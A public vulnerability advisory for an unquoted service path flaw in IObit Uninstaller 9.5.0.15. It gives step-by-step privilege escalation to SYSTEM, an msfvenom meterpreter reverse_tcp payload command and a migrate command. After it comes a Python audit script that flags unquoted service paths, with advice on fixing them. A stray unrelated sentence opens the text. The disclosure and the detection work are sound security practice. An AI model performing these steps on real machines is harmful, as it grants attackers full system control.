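Both layers are needed: the sanitiser protects the file system and every later consumer of the name, and the escaping protects pages that show names which were stored before the sanitiser existed.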
-
IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
# Author: Gobinathan L
# Date: 2020-06-03
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
# Version : 9.5.0.15
# Tested on: Windows 10 64bit(EN)

About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and is not enclosed in quotes, the result is a vulnerability known as Unquoted Service Path, which allows a user to gain SYSTEM privileges (only if the vulnerable service runs at the SYSTEM privilege level, which most of the time it does).

Steps to recreate :
=============================
1. Open CMD and check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc IObitUnSvr ]
4. The command would return..

C:\>sc qc IObitUnSvr
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

5. This confirms that the service is running as SYSTEM, the highest privilege on the machine.
6. Now create a payload with msfvenom or other tools and name it IObit.exe
7. Make sure you have write permissions to the "C:\Program Files (x86)\IObit" directory.
8. Provided that you have the right permissions, drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" directory.
9. Now restart the IObit Uninstaller service by giving the command [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ]
10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process, since you have SYSTEM privilege].

During my testing :
Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different process]

# Disclaimer :
=========================
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
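Added audit example, not part of the advisory: a parser for `sc qc` output and the unquoted-path rule applied to it, which generalises the page's one-line wmic filter (any auto-start service whose executable path is unquoted, contains a space and lives outside `C:\Windows`). The first sample is the advisory's `sc qc IObitUnSvr` output verbatim; the other two blocks are constructed controls that must not be flagged.

```python
import re

# Constructed samples: the advisory's `sc qc IObitUnSvr` output, a quoted path
# (safe) and a Windows-directory path without spaces (safe).
SC_QC_OUTPUTS = [
    r"""
SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
""",
    r"""
SERVICE_NAME: ExampleAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Example Vendor\agent.exe" --service
        SERVICE_START_NAME : LocalSystem
""",
    r"""
SERVICE_NAME: Dnscache
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k NetworkService -p
        SERVICE_START_NAME : NT AUTHORITY\NetworkService
""",
]

# "FIELD_NAME : value" lines; the two-character minimum skips the "C:\>" prompt line.
_KV = re.compile(r"^\s*([A-Z_]{2,})\s*:\s*(.*?)\s*$")


def parse_sc_qc(text):
    """Turn one `sc qc` block into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        m = _KV.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def executable_part(binary_path_name):
    r"""The portion the service controller hands to CreateProcess: a quoted path is
    taken as written, otherwise everything up to and including the first '.exe'."""
    value = binary_path_name.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return value[1:end] if end > 0 else value[1:]
    m = re.match(r"(.*?\.exe)", value, re.IGNORECASE)
    return m.group(1) if m else value.split(" ")[0]


def is_unquoted_service_path(binary_path_name):
    r"""True when the path is unquoted and its executable part contains a space,
    the condition under which Windows tries shorter candidates (C:\Program.exe,
    C:\Program Files (x86)\IObit\IObit.exe, ...) before the real binary."""
    value = binary_path_name.strip()
    return not value.startswith('"') and " " in executable_part(value)


def find_unquoted_services(outputs, skip_windows_dir=True):
    r"""Apply the rule across several `sc qc` outputs. skip_windows_dir mirrors the
    page's wmic filter: C:\Windows\ paths are dropped because they are not user-writable."""
    findings = []
    for text in outputs:
        fields = parse_sc_qc(text)
        path = fields.get("BINARY_PATH_NAME", "")
        if skip_windows_dir and executable_part(path).lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_service_path(path):
            findings.append((fields.get("SERVICE_NAME"),
                             fields.get("SERVICE_START_NAME"),
                             executable_part(path)))
    return findings
```

A finding is only exploitable when a non-administrator can write to one of the intermediate directories (step 7 of the advisory), so pair this scan with an ACL check of each path component. The fix is to quote the path in the service configuration, for example with `sc config <name> binPath=` and the full path in escaped quotes, and to keep the installation directory writable by administrators only.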